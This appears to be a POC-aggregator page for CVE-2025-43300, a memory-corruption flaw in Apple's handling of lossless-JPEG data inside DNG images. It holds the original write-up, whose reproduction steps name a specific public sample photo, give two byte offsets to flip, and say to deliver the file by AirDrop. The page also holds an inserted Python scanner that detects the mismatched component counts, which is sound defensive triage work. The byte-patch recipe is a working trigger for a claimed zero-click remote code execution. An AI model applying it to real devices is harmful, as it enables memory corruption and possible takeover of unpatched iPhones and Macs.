POC details: 61e24c6d37c1a8eed22114bd880860a388427b47

Source
Related vulnerability
Title: Multiple Apple products, security vulnerability (CVE-2025-43300)
Description: Apple iOS and the other products listed are made by the US company Apple. Apple iOS is an operating system developed for mobile devices. Apple macOS is a dedicated operating system developed for Mac computers. Apple iPadOS is an operating system for iPad tablets. Multiple Apple products contain a security vulnerability: processing a malicious image file may lead to memory corruption. The following products and versions are affected: macOS Sonoma 14.7.8, macOS Ventura 13.7.8, iPadOS 17.7.10, macOS Sequoia 15.6.1,
Description
iOS 18.6.1 0-click RCE POC
Introduction
# iOS 18.6.1 0-click RCE POC

The vulnerability seems to be in Apple's implementation of the JPEG Lossless decompression code that is used inside Adobe's DNG file format. I modified `SamplesPerPixel` in the `SubIFD` directory of a DNG to reach the vulnerable function and decreased the `component` count of the `SOF3` block to trigger what seems like an out-of-bounds write.

`RawCamera.bundle`, where all of the vulnerable code lies, seems to be stripped of symbols, so it's hard to explain the code path; I leave that for the reader to figure out. Not all DNG files that use JPEG Lossless compression seem to reach this vulnerable path: I used Adobe's official `Adobe DNG Converter` tool and also `dnglab` to export DNG files with this compression type but never reached this code path until this very specific sample DNG I linked below. This POC doesn't crash iOS 18.6.2 so I assume it's the same bug :P
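The trigger described above is an inconsistency between two fields of the same file: the SubIFD's `SamplesPerPixel` and the component count (Nf) in the lossless-JPEG `SOF3` header of the strip it points to. The following scanner, added here as an example and not part of the original POC, walks a DNG/TIFF's IFD chain and SubIFDs and flags every lossless-JPEG directory whose `SOF3` component count disagrees with `SamplesPerPixel`, which is useful for triaging image files at a gateway or in a sandbox. `build_sample` constructs a minimal synthetic TIFF skeleton (no image data) purely to exercise the check; the writeup itself notes that not every such file reaches the vulnerable path, so a hit is a triage signal, not proof of exploitation.

```python
import struct

SUBIFDS, COMPRESSION, STRIP_OFFSETS, SAMPLES_PER_PIXEL = 0x14A, 0x103, 0x111, 0x115  # TIFF tags
TYPES = {1: ("B", 1), 2: ("B", 1), 3: ("H", 2), 4: ("I", 4), 13: ("I", 4)}  # type -> (struct fmt, width)

def read_ifd(buf, off, e):  # parse the IFD at `off` (e = '<' or '>'); return ({tag: [values]}, next_ifd)
    n, entries = struct.unpack_from(e + "H", buf, off)[0], {}
    for i in range(n):
        tag, typ, cnt, raw = struct.unpack_from(e + "HHI4s", buf, off + 2 + 12 * i)
        fmt, width = TYPES.get(typ, ("B", 1))          # unknown types are kept as raw bytes
        if width * cnt > 4:                            # value does not fit inline: raw is a pointer
            ptr = struct.unpack_from(e + "I", raw)[0]
            raw = buf[ptr:ptr + width * cnt]
        entries[tag] = list(struct.unpack(e + fmt * cnt, raw[:width * cnt]))
    return entries, struct.unpack_from(e + "I", buf, off + 2 + 12 * n)[0]

def sof3_components(blob):  # walk JPEG marker segments; return Nf of the lossless SOF3 (FF C3) header, or None
    i = 2                                              # skip SOI (FF D8)
    while i + 4 <= len(blob) and blob[i] == 0xFF:
        if blob[i + 1] == 0xC3:
            return blob[i + 9]                         # Lf(2) P(1) Y(2) X(2) precede Nf
        i += 2 + struct.unpack_from(">H", blob, i + 2)[0]
    return None

def find_mismatches(buf):
    """Return [(ifd_offset, SamplesPerPixel, Nf)] for lossless-JPEG IFDs whose SOF3 disagrees."""
    e = {b"II": "<", b"MM": ">"}[buf[:2]]
    queue, seen, hits = [struct.unpack_from(e + "I", buf, 4)[0]], set(), []
    while queue:
        off = queue.pop()
        if off == 0 or off in seen:                    # 0 ends a chain; `seen` guards IFD loops
            continue
        seen.add(off)
        ifd, nxt = read_ifd(buf, off, e)
        queue += ifd.get(SUBIFDS, []) + [nxt]
        if ifd.get(COMPRESSION, [1])[0] == 7:          # Compression 7 = JPEG (lossless JPEG in DNG)
            spp = ifd.get(SAMPLES_PER_PIXEL, [1])[0]
            for strip in ifd.get(STRIP_OFFSETS, []):
                nf = sof3_components(buf[strip:])
                if nf is not None and nf != spp:
                    hits.append((off, spp, nf))
    return hits

def build_sample(spp, nf):  # constructed minimal little-endian TIFF: IFD0 -> SubIFD with one lossless-JPEG strip
    ent = lambda tag, typ, v: struct.pack("<HHI", tag, typ, 1) + (struct.pack("<H", v) + b"\0\0" if typ == 3 else struct.pack("<I", v))
    sof3 = b"\xff\xd8\xff\xc3" + struct.pack(">HBHHB", 8 + 3 * nf, 16, 1, 1, nf) + b"\0\x11\0" * nf + b"\xff\xd9"
    ifd0 = struct.pack("<H", 1) + ent(SUBIFDS, 4, 26) + struct.pack("<I", 0)  # 18 bytes, placed at offset 8
    sub = (struct.pack("<H", 4) + ent(COMPRESSION, 3, 7) + ent(STRIP_OFFSETS, 4, 80)
           + ent(SAMPLES_PER_PIXEL, 3, spp) + ent(0x117, 4, len(sof3)) + struct.pack("<I", 0))  # 54 bytes at 26
    return b"II*\0" + struct.pack("<I", 8) + ifd0 + sub + sof3
```

Run `find_mismatches(open(path, "rb").read())` on a real DNG; an empty list means every lossless-JPEG directory is self-consistent, while a tuple names the offending IFD offset and the two disagreeing counts.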

## Reproduction steps:

1. Download https://www.dpreview.com/sample-galleries/4949897610/pentax-k-3-mark-iii-sample-gallery/1638788346
2. Modify the following bytes:

   ```
   0x2FD00:  01 -> 02
   0x3E40B:  02 -> 01
   ```

3. Airdrop etc
File snapshot

[4.0K] /data/pocs/61e24c6d37c1a8eed22114bd880860a388427b47 └── [1.1K] README.md 0 directories, 1 file
The Shenlong bot has cached this for you.
Notes
    1. We recommend accessing the POC through the source first.
    2. If the source has gone offline or cannot be reached, email f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for local POCs. Thank you for your support.